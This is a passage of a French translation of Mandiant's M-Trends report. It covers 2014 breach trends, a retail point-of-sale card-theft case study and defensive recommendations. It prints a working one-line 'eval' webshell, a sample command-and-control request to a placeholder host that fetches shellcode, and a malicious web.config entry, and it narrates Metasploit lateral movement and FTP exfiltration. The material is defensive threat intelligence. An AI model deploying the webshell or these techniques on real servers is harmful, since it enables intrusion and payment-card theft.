  • 5. www.mandiant.com 3 Le phishing, vecteur d’APT des e-mails de phishing recensés utilisaient l’angle de l’informatique ou de la sécurité, les attaquants se faisant souvent passer pour un édi- teur d’antivirus ou le département informatique de l’entreprise ciblée 78 % des e-mails de phishing ont été envoyés pendant les jours ouvrés de la semaine 72 % Dim Sam Ven Jeu Mer Mar Lun Des menaces très diverses NUISANCE VOLDEDONNÉES CYBERCRIME HACKTIVISME DESTRUCTION Objectif Accès et propagation Motivations écono- miques ou politiques Gain financier Diffamation, publicité négative Perturbation des opérations Exemple Botnets et spam GroupesAPT(Advanced PersistentThreat) Vol de numéros de cartes Défiguration de site Suppression de données Ciblé Caracté- ristique Souvent automatisé Persistant Souvent opportuniste Forte visibilité Motivé par un conflit Les attaquants exploitent les réseaux de leurs victimes dans des buts économiques et politiques de plus en plus variés. Lapse de temps entre la première preuve tangible d’une compromission et sa découverte 205 Nombre moyen de jours de présence des attaquants sur le réseau de la victime avant d’être détectés 24 jours de moins qu’en 2013 Présence la plus longue : 2 982 jours Qui découvre la compromission ? 31 % des victimes ont détecté la compro- mission en interne 69 % ont été alertées par une entité externe
  • 6. 4 www.mandiant.com Les nouvelles du frontM-Trends TENDANCE 1 : LE SIGNALEMENT DES ATTAQUES INFORMATIQUES ET SES PROBLÈMES Plus que jamais, les incidents de sécurité propulsent les entreprises victimes sous le feu des médias de plus en plus pressants sur les informations à communiquer. E n 2014, nous sommes intervenus auprès de plus de 30 entreprises qui avaient publiquement déclaré une compromission de données, souvent dans le sillage tourmenté de révélations dans les médias. D’après notre expérience, les entreprises ont tout intérêt à délivrer un message clair et précis, basé sur les informations factuelles d’une analyse de la compromission. Ce faisant, elles éviteront de devoir faire marche-arrière sur des communi- qués antérieurs – et de perdre toute crédibilité au passage. Un public sensible à la cybersécurité Le flot apparemment incessant de compromis- sions divulguées en 2014 a éveillé l’intérêt de l’opinion publique aux problématiques des attaques ciblées et de leurs impacts. En consé- quence, les journalistes, partenaires, investis- seurs et consommateurs ont tendance à poser des questions plus avisées et détaillées en cas de signalement. Ils ne se contentent plus seulement de savoir quand l’incident a eu lieu et quelles données ont été exposées. Ils exigent désormais des détails qui vont du type de malware utilisé à la méthode employée par les attaquants pour persister sur le réseau. Ils se montrent également plus insistants pour savoir qui se cache derrière l’attaque. Ainsi, on nous demande souvent d’attribuer un acte malveillant à tel ou tel auteur dès le premier jour de l’enquête, alors que nous commençons à peine à rassembler les preuves. Même lorsque l’enquête avance, il est de plus en plus difficile de désigner des coupables avec certitude, dans la mesure où les différents profils d’attaquants tendent désormais à utiliser les mêmes outils (voir « Tendance 4 : Entre cybercriminels et groupes APT, la frontière s’estompe », en page 20). Rehausser le niveau À l’heure où de plus en plus d’informations doivent être divulguées, les entreprises victimes prennent peu à peu conscience du caractère crucial d’une communication de crise maitrisée et cohérente. Au moment de rendre l’incident La formulation d’une stratégie de communication efficace passe donc par une bonne compréhension de la portée et de l’étendue de la compro- mission. L’entreprise évitera ainsi de perdre toute crédibilité en revenant sur ses déclarations passées.
  • 7. www.mandiant.com 5 public, elles doivent souvent trancher dans le vif sur les éléments à dévoiler — même lorsque de nombreuses zones d’ombre subsistent. Dans bien des cas, les entreprises doivent lutter de toutes parts pour garder la maîtrise de la situation. Ainsi, nous avons vu des scénarios dans lesquels différentes spéculations sur les modes d’infiltration des attaquants ont déclen- ché une avalanche de démentis, alors même que les enquêteurs tentaient de circonscrire et neutraliser l’incident. Dans ce genre de situation, les enquêteurs passent leur temps à rejeter les hypothèses les plus diverses au lieu de se concentrer sur leur mission première : trouver des indices et faire avancer l’enquête. Pourquoi tant d’attaques informatiques dans la presse ? On nous demande souvent pourquoi les entreprises sont de plus en plus nombreuses à signaler les attaques informatiques dont elles sont victimes. Bien qu’il n’existe pas de réponse définitive, nous voyons deux éléments détermi- nants dans cette tendance. Premièrement, par rapport aux années précédentes, nous sommes intervenus sur davantage de cas où des données de cartes bancaires ou d’identification person- nelle (PII) avaient été exposées. Or, dans bien des cas, la loi impose maintenant aux entreprises victimes de signaler certains aspects de tels incidents. Par ailleurs, dans 69 % des incidents que nous avons traités en 2014, les victimes n’ont pas été en mesure de détecter elles-mêmes la présence des attaquants, n’apprenant la nouvelle que par le biais d’une entité externe (fournisseur, client ou autorités). En d’autres termes : si vous découvrez l’attaque informatique dont vous faites l’objet, il y a fort à parier que d’autres — et pas seulement les attaquants eux-mêmes — auront aussi eu vent de l’incident. Qu’elle décide ou non de rendre un incident public, l’entreprise ne doit jamais perdre de vue le fait que même si les principales parties pre- nantes veulent des réponses immédiates, les enquêtes peuvent prendre des semaines, voire des mois avant que les faits n’émergent. D’où l’importance capitale de bien comprendre la portée et l’étendue de la compromission au mo- ment de définir votre communication de crise. À RETENIR : En divulguant les incidents de sécurité dont elles ont été victimes, de plus en plus d’entreprises se retrouvent sous le feu de la rampe. Médias, clients, partenaires… tous commencent à prendre conscience du fait que les compromissions sont inévitables. Dans le même temps, ils demandent aussi plus d’informations et de détails. Pour bien se préparer à une telle éventualité, les entreprises doivent mettre en place une stratégie de communication efficace. Or, les meilleures stratégies s’établissent et s’appliquent sur la base de faits tangibles, issus d’une enquête rigoureuse.
  • 8. 6 www.mandiant.com Les nouvelles du frontM-Trends MENER UNE ENQUÊTE EFFICACE Nous dressons ici la liste des questions que les médias, investisseurs et clients posent inlassablement lors du signalement public d’un incident de sécurité. Du côté des entreprises victimes, tous les intervenants devront s’accorder sur les réponses à donner pour éviter toute imprécision ou incohérence dans leurs déclarations publiques. Comment les attaquants se sont-ils infiltrés dans votre environnement ? La recette des attaquants se compose généralement d’un mélange d’ingénierie sociale et de vulnérabilités inconnues ou non corrigées. Exploitation d’un serveur Internet, envoi d’une pièce jointe paraissant légitime par e-mail, infection d’un site Web très visité par les publics ciblés... les tactiques varient. D’où l’importance de bien se préparer à expliquer comment les malfaiteurs sont parvenus à s’infiltrer. Plus capital encore, l’entreprise devra pouvoir déclarer avec certitude si l’accès a été bloqué et l’attaque neutralisée. Comment les attaquants sont-ils parvenus à maintenir un accès à l’environnement ? Les attaquants ont souvent besoin d’un accès continu à l’environnement infiltré. Pour les en déloger, vous devrez trouver et bloquer toutes les voies d’accès utilisées. Parmi les méthodes privilégiées, on trouve notamment les portes dérobées (backdoors), les webshells, les accès via le VPN et autres systèmes de connexion à distance des entreprises. Comment l’attaque s’est-elle déroulée ? Bien comprendre comment des attaquants sont parvenus à s’introduire sur le réseau et à en exfiltrer des données est un passage obligé pour la prévention d’une récidive. Sans un diagnostic précis de l’ampleur de l’attaque, il est très difficile d’en mesurer l’impact – et encore plus de l’enrayer. Quelles données les attaquants ont-ils dérobées ? Seule une analyse forensique des systèmes compromis permet généralement de répondre à cette question. Parfois, votre propre examen n’apportera que des éléments de réponse partiels. Travaillez toujours au contact de votre équipe juri- dique pour déterminer vos obligations légales en fonction des types de données volées, que la compromission soit supposée ou avérée. Avez-vous neutralisé l’attaquant ? Si vous avez pu répondre aux quatre premières questions, celle-ci ne devrait normalement pas poser de problème. Une bonne compréhension du déroulé de l’attaque vous permettra de mieux la combattre et de mieux vous en relever.
  • 9. www.mandiant.com 7 4 U.S. Department of Homeland Security and U.S. Secret Service. “Backoff Malware: Infection Assessment.” Août 2014. TENDANCE 2 : LE COMMERCE ET LA DISTRIBUTION DANS LE VISEUR Le monde du commerce et de la distribution s’est retrouvé au centre d’attaques qui ont touché plus de 1 000 entreprises et contraint un nombre incalculable de consommateurs à remplacer leurs cartes bancaires en 2014.4 Mais au-delà du volume d’attaques perpétrées, nos enquêtes ont révélé l’existence de nouveaux groupes, kits d’outils et techniques d’attaques. Les serveurs d’applications virtuelles comme point d’entrée La virtualisation d’applications permet aux utilisateurs de se connecter à distance à des programmes hébergés sur un poste de travail virtuel sécurisé. Une bonne configuration de cet environnement permet de créer une bulle de protection dans laquelle les utilisateurs peuvent évoluer en toute sécurité. Mais dans certains cas, même les erreurs de configuration les plus mineures peuvent ouvrir des brèches dans lesquelles les attaquants ne tardent pas à s’engouffrer pour aller rebondir sur d’autres parties du système. Dans toutes nos enquêtes mettant en lumière ce vecteur d’attaque, nous avons observé la même faille de sécurité : l’accès à distance ne s’effec­ tuait que par l’utilisation d’un login et mot de passe, soit un seul facteur d’authentification, alors que deux facteurs auraient bloqué l’accès. Nouveaux outils, nouvelles tactiques, nouveaux modes opératoires Les nouveaux groupes d’attaques apportent avec eux leur lot d’outils, de tactiques et de modes opératoires. Ainsi, nous avons observé les schémas d’attaque les plus variés, des hackers débutants équipés d’outils largement accessibles jusqu’aux groupes installant des malwares sophistiqués pour la collecte de numéros de cartes sur des terminaux de paiement en magasin. Toutefois, le niveau de compétences importe peu puisque les attaquants novices se sont mon- trés tout aussi aptes à extorquer des numéros de cartes que des groupes plus expérimentés. Dans tous les cas de figure, les malfaiteurs ont pu agir en sous-marin dans l’environnement de leurs victimes, obtenir l’accès aux terminaux de paiement et y installer des malwares pour la collecte des numéros de carte. Recrudescence des attaques sur les paiements e-commerce par carte Les cartes à puce avec code PIN des systèmes Europay, MasterCard et Visa (EMV) débarquent enfin sur le marché américain. Omniprésentes depuis des décennies à travers le monde, ces cartes ont pourtant tardé à s’imposer dans les enseignes outre-Atlantique. L’une de leurs particularités est de générer un code unique à chaque transaction, ce qui rend leur contrefaçon plus difficile et peut contraindre les cybercriminels à se rabattre sur des proies plus faciles. Dans les pays qui ont adopté la technologie EMV, nous avons noté une augmentation de nos interventions sur des cas de compromissions de sites e-commerce et de prestataires de paiement.
  • 10. 8 www.mandiant.com Les nouvelles du frontM-Trends ÉTUDE DE CAS Une grande enseigne américaine victime d’une compromission de millions de cartes de crédit sur une période de 3 mois Le schéma d’attaque ressemble à de nombreux autres scénarios observés dans la grande distribution en 2014 : accès distant au réseau de l’enseigne au moyen d’identifiants valides, utilisation des autorisations associées pour se déplacer latéralement sur le réseau et déploiement de malwares sur les caisses des magasins. Ce n’est qu’après avoir été alerté par les autorités américaines que le distributeur a découvert la compromission. Point initial de la compro- mission L’attaquant s’est d’abord connecté au serveur d’applications virtuelles au moyen d’identifiants légitimes. Le serveur d’applications lui a alors accordé un droit d’accès limité à un poste de travail virtuel. Nous n’avons trouvé aucun échec de connexion, ce qui indique que l’attaquant avait obtenu ces identifiants en amont. (Les éléments en notre possession ne nous permettent cependant pas de définir clairement comment il s’est procuré ces informations.) Il a ensuite profité d’une petite erreur de configuration du poste de travail virtuel pour s’octroyer un privilège d’accès en ligne de commande, c’est-à-dire prendre le contrôle direct du système. Il est ensuite passé par un site FTP Windows pour télécharger un outil de type « password dump » qui lui a permis d’obtenir le mot de passe du compte administrateur local. Ce mot de passe était le même pour tous les systèmes de l’environnement de cette enseigne. Tout ceci s’est déroulé en l’espace de quelques minutes. Déplacement latéral Lors de ses premières manœuvres, l’attaquant a utilisé Metasploit pour se déplacer latéralement dans l’environ­ nement. Metasploit est un framework open source qui sert à développer, tester et exécuter du code d’exploit. Son vaste choix de modules aide les utilisateurs à trouver et exploiter des faiblesses sur les systèmes ciblés. Cette richesse fonctionnelle en fait un outil prisé, tant des cybercriminels que des chercheurs en sécurité. En l’occurrence, l’attaquant a utilisé le module Metasploit psexec_command, ce qui lui a permis d’exécuter des commandes sous forme de service Windows sur le système compromis. Or, cette action laisse un certain nombre de traces dans les journaux d’événements systèmes Windows. Tout en maintenant son accès aux systèmes compromis, l’attaquant s’est ensuite tourné vers le contrôleur de domaine du siège de l’enseigne, c’est- à-dire le serveur qui gère l’authentifica- tion dans l’environnement Windows. Rien de plus facile pour lui puisque les identifiants d’administrateur local qu’il s’était procurés lui permettaient aussi d’accéder au contrôleur de domaine. À l’aide du module Metasploit ntdsgrab, il est ensuite parvenu à obtenir une copie de la base de données NTDS et des registres du système. La base NTDS stocke les informations Active Directory utilisées par les contrôleurs de domaine, y compris les hashs des noms d’utilisateur et mots de passe. Le module ntdsgrab utilise le Service de cliché instantané des volumes (VSS, Volume Shadow Copy Service) de Windows pour créer un cliché instantané de la partition qui contient la base de données NTDS. VSS a pour rôle de créer un snapshot du système à des fins légitimes de sauvegarde et de restauration. Mais dans le cas présent, l’attaquant s’en est servi pour créer une copie de la base NTDS. Dès lors, il a pu recourir à d’autres outils pour en extraire les hashs de mots de passe. Une fois les hashs du mot de passe de l’administrateur de domaine craqués, l’attaquant a pu se déplacer latérale- ment au sein de l’environnement. À ce stade, il est passé de Metasploit à des techniques de déplacement latéral plus traditionnelles, notamment les connexions réseau non-interactives, l’outil Microsoft SysInternals PsExec et des connexions RDP (Remote Desktop Protocol). Une fois connecté au serveur d’applications virtuelles au moyen des identifiants de l’administrateur de domaine, l’attaquant a pu étendre son accès en se connectant aux systèmes via RDP. Porte dérobée Pour maintenir sa présence dans l’en- vironnement compromis, l’attaquant a installé une porte dérobée (backdoor) sur plusieurs machines, sous la forme d’un pilote malveillant conçu pour cibler les systèmes Windows XP. Le malware avait été compressé à l’aide d’un programme ultrasophis- tiqué, semblable à ceux que l’on trouve sur des malwares avancés et pourtant largement accessibles. Le pilote se décompresse d’abord en mémoire, avant de lancer un nouveau thread système. Le pilote original alerte ensuite le système de son échec de chargement.
  • 11. www.mandiant.com 9 Mode de fonctionnement de psexec_command : Le module psexec_command écrit la commande à exécuter et le fichier de sortie (fichier texte) dans un fichier de commandes Windows. Les noms du fichier texte et du fichier de commande Windows comportent 16 caractères générés de manière aléatoire. psexec_command exécute ensuite le fichier de commandes Windows créé dans la première étape. La figure 1 illustre l’information telle qu’elle est inscrite dans le journal d’événements système Windows. Figure 1 : Installation de service via le module Metasploit psexec_command A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYSTEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt > WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG. bat Service Type: user mode service Service Start Type: demand start Parce que le code est décompressé dans un processus séparé du pilote original, le malware est actif en dépit du fait que Windows ne reconnaît pas le chargement du pilote. Ces techniques servent à entraver les efforts de rétroingénierie et à dissimuler la présence d’une porte dérobée. La porte dérobée tire ses fonctionnali- tés d’un shellcode que le pilote décom- pressé injecte dans les processus de l’espace utilisateur (processus qui s’exé- cutent en dehors du noyau Windows). Le shellcode lance une requête HTTP POST à une adresse IP codée en dur et télécharge un shellcode encodé en XOR contenu dans un commentaire HTML. Cette technique a rendu la porte dérobée particulièrement flexible. Pour y ajouter de nouvelles fonctionnalités, il suffisait à l’attaquant de télécharger et d’exécuter un nouveau shellcode. Ce schéma d’utilisation d’un shellcode n’est pas nouveau, mais le duo qu’il formait avec le programme de compression en ont fait un malware particulièrement sophistiqué. La figure 2 illustre le mode de commu- nication entre le système infecté et le serveur de commande et contrôle (CnC). Figure 2 : Communication par la porte dérobée POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA> <!-XOR_Encoded_Shellcode --> La porte dérobée envoie une requête HTTP POST au serveur de commande et contrôle (CnC) Téléchargement et exécution d’un shellcode encodé en XOR Système infecté CnC du hacker
  • 12. 10 www.mandiant.com Les nouvelles du frontM-Trends Toutes les caisses de tous les magasins de l’enseigne s’authen- tifiaient auprès du contrôleur de domaine central. En d’autres termes, quiconque avait accès au contrôleur de domaine pouvait accéder directement aux caisses des magasins. Exfiltration de données Une fois en possession du mot de passe administrateur du domaine, l’attaquant a pu accéder à sa guise aux systèmes Windows de l’environnement informa- tique du siège de l’entreprise. De là, il s’est attelé à obtenir l’accès à l’environnement informatique des magasins. Cet environnement était configuré comme suit : • Le domaine des magasins avait une relation bidirectionnelle avec le domaine du siège. • Les caisses des magasins étaient sous Microsoft Windows XP. • Les caisses étaient reliées au domaine des magasins. Cette configuration, très courante dans la grande distribution, a donné deux avantages à l’attaquant. Premièrement, les identifiants d’admini­ strateur de domaines lui ont donné des privilèges d’accès aux systèmes du domaine des magasins. Deuxièmement, le domaine des maga- sins était un domaine enfant du domaine du siège. Aussi, pour maintenir certaines fonctionnalités actives, plusieurs ports critiques devaient rester ouverts en permanence entre les contrôleurs de domaine du siège et les magasins. Or, ces ports ouverts contournaient toutes les autres règles mises en place sur les pare-feu. L’attaquant s’est donc servi de ces ports ouverts pour accéder au contrôleur de domaine, qui à son tour lui a permis de s’introduire dans l’environnement des magasins. Toutes les caisses de tous les magasins de l’enseigne s’authentifiaient auprès du contrôleur de domaine central. En d’autres termes, quiconque avait accès au contrôleur de domaine pouvait accéder directement aux caisses des magasins. À l’aide d’un script de commandes Windows sur le contrôleur de domaine des magasins, l’attaquant a copié le malware de collecte d’informa- tions de cartes bancaires sur chacune des caisses des points de vente. Une tâche Windows planifiée lui a ensuite permis d’activer le malware. C’est ainsi qu’il a pu extraire des infor- mations de la mémoire de traitement de l’application, notamment le numéro de compte et la date d’expiration enregistrés sur la bande magnétique de la carte. Ces informations peuvent ensuite être revendues à des spécia­ listes de la contrefaçon de cartes. Le malware est passé par OSQL, un outil de requête de ligne de commande SQL préinstallé sur les caisses, pour inscrire les données des cartes ban- caires sur la base de données MSSQL temporaire tempdb. Les données de la table tempdb sont effacées dès l’arrêt du service MSSQL. Une fois par jour, l’attaquant envoyait donc une requête à la base tempdb sur toutes les caisses des magasins. Les données transmises en retour étaient ensuite transférées vers un fichier texte sur le contrôleur de domaine. De là, l’attaquant archivait le fichier texte et l’envoyait à un poste de travail connecté à Internet dans l’environne- ment des magasins. Il ne lui restait alors plus qu’à le charger sur un serveur sous son contrôle via le protocole FTP. La figure 3 retrace le déroulé de l’attaque.
  • 13. www.mandiant.com 11 Figure 3 : Résumé de l’attaque L’attaquant a trouvé une brèche dans l’appli- cation virtuelle qui lui a permis de se déplacer latéralement au sein de l’environnement infor- matique du siège. De là, il a pu récupérer des identifiants de connexion sur les systèmes de l’environnement. 2 L’attaquant s’est servi du contrôleur de domaine des magasins comme plaque tournante pour l’accès aux caisses dans les points de vente. Il y a ensuite installé un malware qui collectait les données de cartes bancaires sur chacune de ces caisses. 3 L’attaquant s’est infiltré à distance dans l’environnement de l’entreprise via un serveur d’applications virtuelles. Il s’est ensuite authentifié au moyen d’identifiants valides. 1 L’attaquant a collecté les données de cartes ban- caires sur les caisses des magasins, avant de les transférer du contrôleur de domaine vers un poste de travail utilisateur dans l’environnement des maga- sins. Les données volées ont ensuite été exfiltrées via FTP vers un site FTP externe sous son contrôle. 4 Serveur d’applications virtuelles Contrôleur de domaine du siège Contrôleur de domaine des magasins Poste de travail utilisateur Accès initial Exfiltration de données via FTP Poste de travail utilisateur Caisse 1 Caisse 2 Magasin 2 Domaine des magasinsDomaine du siège DMZ Caisse 1 Caisse 2 Magasin 1 Trafic CnC Attaquant
  • 14. 12 www.mandiant.com Les nouvelles du frontM-Trends À RETENIR : L’argent attire le crime. De fait, la grande distribution a toujours été dans la ligne de mire de cybercriminels motivés par l’appât du gain. L’année 2014 n’a pas dérogé à la règle. Certes, les attaquants ont encore plus fait parler d’eux dans les médias. Mais malgré quelques nouveautés, ils ont récité une partition globalement semblable à ce que nous avons observé ces dernières années. Recommandations Face à cette recrudescence d’attaques, quelle position les grandes enseignes doivent-elles adop- ter ? D’abord, soyons clairs : il est impossible de bloquer toutes les attaques et toutes les compro- missions. Toutefois, ces quelques recommandations pourront restreindre la capacité des atta- quants à s’infiltrer dans votre environnement et à s’y déplacer latéralement. Avec les bons ou- tils et une équipe de sécurité vigilante, vous pouvez ralentir la progression de l’attaque et vous donner le temps nécessaire pour détecter, analyser et réagir avant que le pire ne se produise. Accès distants sécurisés Commencez par dresser un bilan des modes d’accès distants de vos salariés, fournisseurs et sous-traitants à votre environnement. En- tamez un processus de contrôle de tous les accès distants, notamment le nombre de mé- thodes d’accès, les utilisateurs habilités et les exigences en matière de mots de passe. Tous les accès distants devraient être soumis à une authentification à deux facteurs. Assu- rez une surveillance active de toutes les connexions distantes pour y déceler d’éven- tuelles activités suspectes. Accès sécurisés à l’environ­ nement PCI Séparez votre environnement PCI (Payment Card Industry) du reste de votre réseau. Tout accès aux systèmes dans l’environ­ne- ment PCI devra passer par un serveur de rebond sécurisé, chargé de gérer les équipe- ments au sein des zones à haute sécurité. L’accès à ce serveur sera également soumis à une authentification à deux facteurs. Dans la mesure du possible, essayez de sé- parer les domaines des magasins
pour res- treindre les connexions à d’autres environ- nements. De même, limitez les trafics réseau sortant à une liste de connexions approuvées dans le cadre de vos activités. Établissez une liste blanche d’applications pour vos systèmes critiques Pour éviter l’exécution de fichiers malveillants sur des systèmes critiques, tous ces systèmes devront tenir à jour une liste blanche d’appli- cations autorisées. Ce dispositif s’étendra à tous les systèmes qui traitent des données de cartes bancaires, les serveurs de rebond et d’autres systèmes critiques comme les contrôleurs de domaine. Gestion des comptes à forts privilèges Administrateur local, administrateur de domaine, comptes de service… les atta- quants ciblent en priorité les comptes dotés de forts privilèges. La première chose à faire est donc d’en réduire le nombre. De même, assurez-vous que tous les comptes admi- nistrateurs locaux utilisent bien des mots de passe différents. Un outil d’administration et de protection des mots de passe vous per- mettra de gérer des identifiants uniques et de changer le mot de passe d’un compte après chaque utilisation. Ces technologies vous confèreront une plus grande maîtrise des comptes privilégiés.
  • 15. www.mandiant.com 13 TENDANCE 3 : L’ÉVOLUTION DU CYCLE DE VIE DES ATTAQUES La majorité des incidents sur lesquels nous enquêtons suivent un schéma classique que nous appelons « cycle de vie des attaques ». L es équipes de sécurité et les attaquants semblent constamment jouer au chat et à la souris : à peine les uns déploient-ils de nouveaux dispositifs de défense qu’aussitôt, les autres modifient leurs tactiques. Cette tendance s’est poursuivie en 2014, année marquée entre autres par une hausse des détournements des connexions VPN visant à maintenir un accès permanent aux environnements des entreprises victimes. Nous avons également observé l’émer- gence de techniques élaborées permettant d’é- chapper aux systèmes de détection, sans oublier de nouveaux outils et tactiques destinés à voler des identifiants et à se déplacer latéralement dans les environnements compromis. Détournements des connexions VPN L’accès au VPN d’une entreprise offre deux avantages décisifs aux attaquants : 1) celui de s’implanter dans un environnement sans avoir à y installer de portes dérobées et 2) celui de se fondre dans la masse en imitant les comporte- ments d’utilisateurs autorisés. Ainsi, une fois sur le réseau, les groupes d’attaque que nous avons étudiés se sont immédiatement tournés vers les dispositifs VPN et leurs identi- fiants d’accès. En ce sens, 2014 fut une nouvelle année record : jamais nous n’avions recensé autant de cas d’accès malveillants aux VPN des entreprises. La plupart de nos investigations ont fait apparaître deux grands vecteurs d’attaques des VPN : • Authentification à facteur unique : si l’accès au VPN ne s’effectuait que par nom d’utilisateur et mot de passe valides, les attaquants n’ont eu qu’à réutiliser des iden- tifiants récupérés dans le domaine Active Directory ou les systèmes compromis des utilisateurs. • Authentification à deux facteurs basée sur des certificats : dès lors que le deuxième facteur d’authentification était un certificat numérique propre à chaque utilisateur, les attaquants se sont servis d’outils très courants comme Mimikatz pour extraire ces certificats des systèmes compromis. Dans certains scénarios, le manque de sécurité dans la distribution des certificats VPN (pièce jointe d’e-mails non-cryptés ou plates-formes ouvertes de partage de fichiers) leur a facilité la tâche. Dans des cas plus rares, les attaquants ont eu recours à des exploits zero-day pour contourner le processus d’authentification VPN. Nous cite- rons évidemment « Heartbleed », une vulnéra- bilité dans l’extension Heartbeat du protocole TLS (Transport Layer Security) qui a fait les gros titres en avril dernier. Cette faille permettait en effet aux attaquants de récupérer des buffers mémoire de 64 Ko sur les serveurs et périphé- riques vulnérables, et ce à partir d’une simple requête. Au moment de la découverte de Heartbleed, l’im- pact de cette vulnérabilité et les probabilités de vol de données sensibles (clés de cryptage, iden- tifiants, etc.) ont fait débat chez les spécialistes. Mais leurs pires craintes se sont hélas réalisées. Ainsi, quelques semaines après le signalement, nous avons enquêté sur une attaque au cours de laquelle cette faille avait servi à détourner les sessions d’utilisateurs authentifiés pour accéder au réseau de l’entreprise ciblée, et ce sans aucun identifiant. Les semaines suivantes, les attaquants répétèrent l’opération sur les infrastructures VPN d’autres entreprises.
  • 16. 14 www.mandiant.com Les nouvelles du frontM-Trends Dans tous ces cas de figures, les journaux des connexions VPN ont gardé des traces révélatrices des modes opératoires. Ainsi, les adresses IP en provenance des sessions utilisateurs authenti- fiées changeaient rapidement entre différents blocs d’adresses, différents fournisseurs IP et différentes zones géographiques. Dissimulation de malwares sous le nez des victimes En 2014, la détection de malwares s’est de nouveau apparentée à une course à l’armement entre attaquants et défenseurs. Ainsi, on a assisté à l’émergence de nouvelles techniques permettant aux attaquants de camoufler leurs actions et de dissimuler des malwares sur les systèmes infectés. Dissimulation de webshells Connues sous le nom de webshells, les portes dérobées basées sur le Web sont une forme de malware apparu il y a une dizaine d’années. Aujourd’hui, leurs capacités à échapper aux sys- tèmes de détection des hôtes et des réseaux en font un outil privilégié pour les attaques ciblées. Figure 4 : Nouvelles techniques d’attaque observées durant les enquêtes Mandiant Compromission initiale Implantation Escalade des privilèges Reconnaissance interne Mission accomplie Déplacement latéral Maintien de présence Détournement de connexions VPN Jamais Mandiant n’a observé autant de cas d’accès malveil- lants aux VPN des entreprises. Packages de sécurité malveillants Les attaquants ont profité de l’extensi- bilité des packages de sécurité Windows pour charger des portes dérobées et des enregistreurs de mots de passe. Dissimulation de webshells Les attaquants n’ont cessé d’innover pour déployer et dissimuler des malwares sur le Web. Mandiant a observé plusieurs techniques, dont les suivantes : • Implantation sur les serveurs de scripts shell exploitant le cryptage SSL pour contourner les dispositifs de surveillance réseau • Intégration d’une ligne de script shell ‘eval’ sur des pages Web légitimes • Fichiers de configuration serveurs modifiés pour charger des fichiers DLL malveillants Exploitation du système WMI et du langage PowerShell Pour maintenir leur présence, col- lecter des données et se déplacer latéralement dans les environne- ments infiltrés, les attaquants ont eu de plus en plus recours aux composants Windows WMI et PowerShell. Attaques Kerberos Après s’être approprié des privilèges d’administrateur de domaine, les attaquants ont lancé des attaques Kerberos « golden ticket » pour s’authentifier comme n’importe quel utilisateur privilégié – même après réinitialisation des mots de passe du domaine. Mots de passe en clair Les attaquants ont exploité des varian- tes recompilées de l’utilitaire Mimikatz pour récupérer des mots de passe en clair dans la mémoire, tout en échap- pant aux détections anti-virus. À mesure que les défenses se renforcent, les attaquants s’adap- tent et innovent. En 2014, nous avons constaté l’émergence de nouvelles techniques de piratage à chaque étape du cycle de vie des attaques. En voici les grandes lignes. Nous avons étudié plusieurs cas où les atta­ quants étaient parvenus à installer leurs webshells sur des serveurs cryptant leurs communications par SSL (Secure Layer Socket). En conséquence, toutes les requêtes émises vers et depuis la porte dérobée étaient cryptées par la propre clé privée (légitimement installée) du serveur. L’architecture réseau de la victime n’ayant pas été configurée pour contrôler le trafic SSL, les actions des attaquants sont passées totalement inaperçues. Nous prévoyons la poursuite de cette tendance, à l’heure où de plus en plus d’entreprises adop- tent le SSL pour crypter l’ensemble de leurs services Web déployés sur Internet. Autre technique furtive observée : le détour- nement des pages Web légitimes à l’aide de scripts shell ‘eval’. Conçus pour exécuter du code à partir d’un paramètre de requête HTTP, ces mini-scripts de quelques dizaines d’octets se dissimulent facilement dans un fichier HTML plus long.
  • 17. www.mandiant.com 15 composants OS basiques et exécuter des com- mandes. Par ailleurs, WMI fournit un framework d’événements capable de déclencher des appli- cations (y compris des malwares) en fonction des changements d’état d’objets spécifiques. Ces dernières années, nous n’avions rencontré que peu de cas d’utilisation de WMI pour échap- per aux détections. Ceci s’explique probable- ment par la complexité des interactions WMI et la disponibilité de techniques de persistance plus simples et suffisamment efficaces pour rester incognito. Toutefois, en 2014, quelques groupes se sont servis de WMI pour maintenir une présence discrète dans les environnements infiltrés. Cette technique consiste à créer trois objets WMI (généralement à l’aide du langage Power- Shell): • Filtre d’événements : cet objet interroge le système sur un événement récurrent (par exemple une heure donnée ou le nombre de secondes écoulées depuis le démarrage de la machine) qui pourrait servir de mécanisme de persistance. • Consommateur d’événements : cet objet exécute un script ou une commande spéci- fique permettant de « consommer » l’événe- ment. En général, les attaquants créent soit des consommateurs d’événements de ligne de commande (pour l’exécution d’une com- mande arbitraire), soit des consommateurs de script actif (pour l’exécution de scripts VBScript). • Liaison consommateur-filtre : cet objet assure l’exécution d’un consommateur d’événements lorsqu’un filtre est activé. Figure 5 : Exemple de webshell ‘eval’ <%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%> Figure 6 : Extrait de fichier web.config modifié <!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules> Ainsi, pour les requêtes HTTP ordinaires, la page Web infectée s’affiche normalement. Mais dès lors que l’attaquant utilise un certain paramètre dans sa requête, la commande ‘eval’ se met à parser et exécuter le code malveillant. La figure 5 montre un script shell ‘eval’ qui peut être soit autonome, soit incorporé à une autre page Web. Le client webshell de l’attaquant devra intégrer le code malveillant dans le paramètre de requête p1. Dernier exemple de technique d’attaque par malware sur le Web : la modification du fichier de configuration (web.config) d’un serveur Web exécutant les services Microsoft IIS (Internet Information Services). Particulièrement astu- cieuse, cette technique pousse le serveur infec- té à charger un module HTTP malveillant. La figure 6 montre un extrait « désinfecté » d’un fichier web.config modifié. Ce changement déclenche le chargement du fichier BadModule.dll à partir d’un répertoire de modules partagé et son utilisation pour le traite- ment de toutes les requêtes Web ultérieures. Ainsi, le malware parse et récupère les contenus de toutes les requêtes Web envoyées au serveur – y compris les identifiants utilisateurs. La figure 6 est un extrait de fichier web.config « désinfecté ». Dans l’attaque réelle, le nom du module simule une vraie DLL Microsoft. Pour échapper à toute détection, l’attaquant modifie les horodatages du malware et du fichier de configuration. WMI comme vecteur de persistance Composant majeur de Windows, WMI (Windows Management Instrumentation) intègre un large éventail d’interfaces et de fonctionnalités de gestion système. Les applications et langages comme PowerShell et VBScript utilisent WMI pour collecter des données, interagir avec des
